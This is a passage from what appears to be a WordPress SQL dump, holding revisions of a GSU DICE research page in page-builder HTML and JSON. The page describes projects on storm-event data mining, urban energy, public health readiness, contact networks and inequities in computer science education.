gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n            <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n            <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n                      districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n                      demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n                      and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:16:20','2023-09-29 15:16:20','',126,'https://gsudice.dataconn.net/?p=1543',0,'revision','',0),(1549,1,'2023-09-29 11:16:59','2023-09-29 15:16:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:16:59','2023-09-29 15:16:59','',438,'https://gsudice.dataconn.net/?p=1549',0,'revision','',0),(1550,1,'2023-09-29 11:16:59','2023-09-29 15:16:59','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 